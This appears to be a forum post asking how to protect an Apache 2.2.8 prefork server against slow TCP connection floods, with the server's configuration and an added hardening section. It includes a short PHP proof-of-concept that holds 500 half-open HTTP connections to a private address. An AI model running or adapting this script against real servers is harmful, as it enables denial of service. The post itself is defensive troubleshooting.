Hello,
One of my servers was affected by a TCP flood attack targeted at the http service
(Apache 2.2.8). Short attack description: an attacker opens a large number of
TCP connections to the Apache service and sends a few bytes (for example, a single
"GET / HTTP/1.1" line) on every opened connection. The HTTP service opens a
new process for every such connection and waits for further input. After a
short time, HTTPd reaches its connection limit and stops responding.
Some of my servers are protected by a state-tracking firewall that protects
them against this kind of attack.
My question: is it possible to configure Apache HTTPd to protect
it against these attacks?
Thank you in advance.
#####################################################################################
Here is a simple PHP script that demonstrates the attack:
<?php
/**
 * Proof of concept script: TCP connection flooding
 * THIS SCRIPT WAS WRITTEN FOR INTERNAL TEST PURPOSES ONLY!!!
 */
// "Victim" server IP address or domain name
$target_host = '192.168.2.222';
// TCP port (normally, 80)
$target_port = 25;
$conn = array();
for ($i = 0; $i < 500; $i++) {
    // Open a connection; @ suppresses the warning if the server refuses it
    if ($conn[$i] = @fsockopen($target_host, $target_port)) {
        echo "Connection #$i opened\n";
        flush();
        // Send only the request line and grab an Apache process: the server
        // now waits for the rest of the request headers
        fwrite($conn[$i], "GET / HTTP/1.1\r\n");
    }
}
sleep(30); // Keep every connection open: the server must be blocked until the script exits
?>
#####################################################################################
Here is some local Apache data:
# /usr/sbin/apache2ctl -V
Server version: Apache/2.2.8 (Ubuntu)
Server built: Mar 10 2009 18:09:51
Server's Module Magic Number: 20051115:11
Server loaded: APR 1.2.11, APR-Util 1.2.12
Compiled using: APR 1.2.11, APR-Util 1.2.12
Architecture: 64-bit
Server MPM: Prefork
threaded: no
forked: yes (variable process count)
Server compiled with....
-D APACHE_MPM_DIR="server/mpm/prefork"
-D APR_HAS_SENDFILE
-D APR_HAS_MMAP
-D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
-D APR_USE_SYSVSEM_SERIALIZE
-D APR_USE_PTHREAD_SERIALIZE
-D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
-D APR_HAS_OTHER_CHILD
-D AP_HAVE_RELIABLE_PIPED_LOGS
-D DYNAMIC_MODULE_LIMIT=128
-D HTTPD_ROOT=""
-D SUEXEC_BIN="/usr/lib/apache2/suexec"
-D DEFAULT_PIDLOG="/var/run/apache2.pid"
-D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
-D DEFAULT_LOCKFILE="/var/run/apache2/accept.lock"
-D DEFAULT_ERRORLOG="logs/error_log"
-D AP_TYPES_CONFIG_FILE="/etc/apache2/mime.types"
-D SERVER_CONFIG_FILE="/etc/apache2/apache2.conf"
#####################################################################################
# cat apache2.conf |egrep "^[a-zA-Z0-9 \t<].*"
ServerRoot "/etc/apache2"
LockFile /var/lock/apache2/accept.lock
PidFile ${APACHE_PID_FILE}
Timeout 15
KeepAlive Off
MaxKeepAliveRequests 100
KeepAliveTimeout 10
<IfModule mpm_prefork_module>
StartServers 5
MinSpareServers 5
MaxSpareServers 10
MaxClients 100
MaxRequestsPerChild 0
</IfModule>
<IfModule mpm_worker_module>
StartServers 2
MaxClients 100
MinSpareThreads 25
MaxSpareThreads 50
ThreadsPerChild 25
MaxRequestsPerChild 0
</IfModule>
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
AccessFileName .htaccess
<Files ~ "^\.ht">
Order allow,deny
Deny from all
</Files>
DefaultType text/plain
HostnameLookups Off
ErrorLog /var/log/apache2/error.log
LogLevel warn
Include /etc/apache2/mods-enabled/*.load
Include /etc/apache2/mods-enabled/*.conf
Include /etc/apache2/httpd.conf
Include /etc/apache2/ports.conf
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
ServerTokens Prod
ServerSignature Off
Include /etc/apache2/conf.d/
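The fragment below is an added example and is not part of the original post: an Apache 2.2 prefork configuration that limits how long a half-sent request can hold a child process, shown next to the settings from the dump above. The directive names are real Apache directives; the numeric values are assumptions to be tuned per server, and the mod_reqtimeout block only takes effect on Apache 2.2.15 or later, since the 2.2.8 build shown above does not ship that module.

```apache
# Added example (not from the original post): prefork hardening against
# slow-connection floods for an Apache 2.2 server like the one above.
# Check the result with:  apache2ctl -t && apache2ctl -M | grep reqtimeout

# 1. Do not wait long for silent clients. In Apache 2.2, Timeout is the
#    longest the server waits for each read from the client, so a client
#    that sends one request line and then goes quiet is dropped after this
#    many seconds. The original config already has 15 (the default is 300);
#    10 is an assumed value that is still generous for a LAN or a normal
#    browser.
Timeout 10
KeepAlive Off

# 2. mod_reqtimeout (Apache >= 2.2.15; silently skipped on 2.2.8). It bounds
#    the phase the flood script stalls in, receiving the request line and
#    headers: at most 10 s, extended up to a hard 20 s only while the client
#    keeps delivering at least 500 bytes/s. Request bodies get the same
#    treatment. The numbers are assumed values, not defaults.
<IfModule mod_reqtimeout.c>
    RequestReadTimeout header=10-20,MinRate=500 body=10,MinRate=500
</IfModule>

# 3. More slots than 100, so that one flooding host cannot fill the server
#    before the timeouts above free connections. Every prefork child is a
#    full process: size ServerLimit and MaxClients to the memory you can
#    give Apache divided by the resident size of one child (assumed here to
#    allow 256).
<IfModule mpm_prefork_module>
    StartServers          5
    MinSpareServers       5
    MaxSpareServers      10
    ServerLimit         256
    MaxClients          256
    MaxRequestsPerChild   0
</IfModule>
```

Even with these settings each flooding connection still occupies one child for up to Timeout seconds and the attacker can simply reconnect, so the per-source connection cap that the state-tracking firewall on the other servers provides remains the stronger layer. On the Apache host itself the equivalent is a netfilter connlimit rule such as `iptables -A INPUT -p tcp --syn --dport 80 -m connlimit --connlimit-above 30 -j DROP` (the 30 is an assumed threshold; pick one above what a legitimate client or proxy opens to you).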